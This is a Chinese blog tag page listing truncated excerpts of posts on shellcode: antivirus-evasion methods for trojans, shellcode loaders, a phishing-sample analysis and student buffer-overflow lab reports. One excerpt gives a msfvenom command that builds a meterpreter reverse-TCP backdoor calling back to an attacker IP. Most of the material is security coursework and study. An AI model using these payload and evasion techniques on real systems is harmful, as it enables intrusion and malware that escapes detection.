首页 > TAG信息列表 > shellcode
Go语言实现的木马免杀
Go-Shellcode-Bypass Golang实现的简单免杀,项目地址:https://github.com/Cuerz/Go-Shellcode-Bypass 免杀思路 原理:1.延长运行时间,导致杀软检测超时, 2.利用杀软对golang的弱检测, 3.对shellcode进行多次编码解码来隐藏特征, 4.加载无关字符串混淆。 首先用msf或者cs攻防世界 repeater 题解
攻防世界 repeater 题解 查看程序保护情况,开启了PIE,没开NX,RELRO全开。 在ida64中打开分析程序,这道题程序比较简单。可以发现的信息如下: 字符数组s大小为0x20,但可以读入0x40的长度,起始于rbp-30h处(见红框) 变量v5可以控制循环、条件控制输出main函数地址,该变量位于rbp-20h字符数木马免杀
最近学了点木马免杀,其实总结起来一共有三个层面,代码面,文件面,逻辑面。 代码层面可以通过shellcode编码混淆,编辑执行器,分离加载器等方法进行免杀 文件面可以通过特征码定位,加壳花指令等方式 逻辑面可以通过一些反vt虚拟机的方法进行免杀 下面先介绍一些语言的shellcode加载方式和一栈溢出漏洞利用流程——以syncbrs为例
0x1 缓冲区溢出漏洞攻击简介 缓冲区溢出攻击是针对程序设计缺陷,向程序输入缓冲区写入使之溢出的内容(通常是超过缓冲区能保存的最大数据量的数据),从而破坏程序的堆栈,使程序转而执行其他指令,以达到攻击的目的。 缓冲区溢出中,最为危险的是堆栈溢出,因为入侵者可以利用堆栈溢出,在函数返编写X86的ShellCode
ShellCode 定义 ShellCode是不依赖环境,放到任何地方都能够执行的机器码 编写ShellCode的方式有两种,分别是用编程语言编写或者用ShellCode生成器自动生成 ShellCode生成器生成的shellcode功能比较单一,常见的ShellCode生成器有shell storm、Msfvenom等 而用编程语言写的shellcode会PE格式: 新建节并插入代码
PE格式是 Windows下最常用的可执行文件格式,理解PE文件格式不仅可以了解操作系统的加载流程,还可以更好的理解操作系统对进程和内存相关的管理知识,而有些技术必须建立在了解PE文件格式的基础上,如文件加密与解密,病毒分析,外挂技术等。 经过了前一章的学习相信你已经能够独立完成PE文件结构从初识到简单shellcode注入
本文首发自:https://tttang.com/archive/1553/ 前言 将自己学习的PE文件结构进行总结形成文章这件事情,一直躺在我的Notion TodoList里,但是一直是未完成的状态哈哈,拖了那么久也该让它状态变成已完成了。 PE文件简介 PE文件的全称是Portable Executable,意为可移植的可执行的文某cs stager钓鱼样本分析
目录PE信息分析伪装检测邮件创建线程加载shellcodecs stager shellcode PE信息 分析 伪装检测邮件 创建线程加载shellcode 动态加载函数 通过GetTickCount反沙箱、反调试 通过uuid加载shellcode cs stager shellcode我的shellcode loader观-1
包含内容: 1.传统的shellcode loader 2.Python中的加密loader 3.Python相对于shelcode load 的优势 4.cython帮助我们将.py转.c 5.Python中源码混淆工具分享 1 . shellcode loader 这是一个源码: import ctypes shellcode = bytearray(b'') ctypes.windll.kernex64 ShellCode 弹出计算器
Main.cpp extern "C" void PopCalculator(); extern "C" void _INT3(); int main() { _INT3(); PopCalculator(); return 0; } Code.asm PopCalculator proto _INT3 proto ; Hash: ; ; WinExec : 0x1A22F51 ; LoadLibrary : 0x0C917420212818 2021-2022-2 《网络攻防实践》实践九报告
一、实践内容 一)软件安全的概述 1.软件安全的威胁 NIST将安全漏洞定义为:在系统安全流程、设计、实现或内部控制中所存在的缺陷或弱点,能够被攻击者所利用并导致安全侵害或对系统安全策略的违反。 随着计算机技术和网络的发展,软件的功能越来越强大,已经从严格的技术领域扩展到社会生20212810 2021-2022-2 《网络攻防实践》实践九报告
20212810 2021-2022-2 《网络攻防实践》实践九报告 软件安全攻防--缓冲区溢出和shellcode 一.实践内容 本次实践的对象是一个名为pwn1的linux可执行文件。 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。 该程序同时包含另一个代码片段,getShell,会20212803 2021-2022-2 《网络攻防实践》实践九报告
20212803 2021-2022-2 《网络攻防实践》实践九报告 1.实践内容 本次实践的内容主要是对名为pwn1的linux文件进行操作。文件的程序执行流程为main调用foo函数,foo函数回显任何用户输入的字符串。此程序还包含getShell代码段,会返回shell,但正常情况是不会被运行的。实践任务就是要运行20212931 2021-2022-2 《网络攻防实践》第九次实验任务
一、实践内容 (一)基础知识 软件安全漏洞威胁 定义:在系统安全流程、设计、实现或内部控制中所存在的缺陷或弱点,能够被攻击者所利用并导致安全侵害或对系统安全策略的违反。包括三个基本元素:系统的脆弱性或缺陷、攻击者对缺陷的可访问性、攻击者对缺陷的可利用性。 分类: 内存安全违20212937 曾俊铭 网络攻防实验报告
20212937 曾俊铭 2021-2022-2 《网络攻防实践》实践报告 1.实践内容 实践目标: 本次实践的对象是一个名为pwn1的linux可执行文件。 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。 注20212919 2021-2022-2 《网络攻防实践》实践九报告
20212919 2021-2022-2 《网络攻防实践》实践九报告 1.实践内容 实践目标: 本次实践的对象是一个名为pwn1的linux可执行文件。 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下20212813 2021-2022-2 《网络攻防实践》实践九报告
一、实践内容 1、实践目标 本次实践的对象是一个名为pwn1的linux可执行文件。 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是【原创】ShellCode免杀的骚姿势
ShellCode免杀的骚姿势 常见的免杀手法: shellcode(攻击代码)和加载程序的分离; Lolbins白利用加载shellcode(白名单利用); shellcode混淆、编码解码; shellcode(攻击代码)和加载程序的分离 生成一个C语言的playload做测试实验; 本质上生成c的payload就是16进制的代码,这些代码插入目标EXP3
实验效果 ✅将后门程序和目标程序捆绑在一起,实现运行目标程序时回连攻击机的目的 shellcode的生成 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.128 LPORT=4314 -f hex 通过msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.128 LPORT=4314命令memcpy函数实现缓冲区溢出漏洞
本次实验需要用到的环境和工具要是需要的可以留言评论,我就不一一介绍了,估计也没啥人看。主要是太多了,我不想打字。 学习这个漏洞我们要去学习漏洞的理论知识。 在汇编程序的执行过程中,如果需要调用某个函数一般是call函数地址,而call这条指令在执行的时候会把函数返回地址(执行完函学号20192411 2021-2022-2 《网络与系统攻防技术》实验3实验报告
学号20192411 2021-2022-2 《网络与系统攻防技术》实验3实验报告 目录学号20192411 2021-2022-2 《网络与系统攻防技术》实验3实验报告1.实验内容2.实验过程2.1 正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧2.1.1 正确使用msf编码器,使用msfvenom生成如jar20192428魏来 《网络与系统系统攻防技术》实验三 免杀原理与实践
《网络与系统攻防技术》实验三 免杀原理与实践 实践目标 正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件 veil,加壳工具 使用C + shellcode编程 通过组合应用各种技术实现恶意代码免杀 如果成功实Exp3-免杀原理
Exp3-免杀原理 基础问题回答 (1)杀软是如何检测出恶意代码的? 杀软工程师将一些恶意软件提取特征码发布到病毒库中,用户更新病毒库就相当于更新了特征码库。 杀毒软件在杀毒过程中把当前检测样本文件特征码与病毒库中病毒特征码进行比对,特征码相同则报毒并且查杀,否则进行更多的处理。Exp3-免杀原理与实践
Exp3-免杀原理 姓名:徐海文 学号:20191228 课程:网络对抗技术 一、基础问题回答 1.杀软是如何检测出恶意代码的? (1)基于特征码的检测 特征码是能识别一个程序是一个病毒的一段不大于64字节的特征串。如果一个可执行文件包含这样的特征码则被杀毒软件检测为是恶意代码。 (2)启20192413宗俊豪 2021-2022-2 《网络与系统攻防技术》实验三实验报告
20192413 宗俊豪 2021-2022-2 《网络与系统攻防技术》实验三实验报告 1.实验内容 (1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件 veil,加壳工具 使用C + shellcode编程 (2)通过组合应用各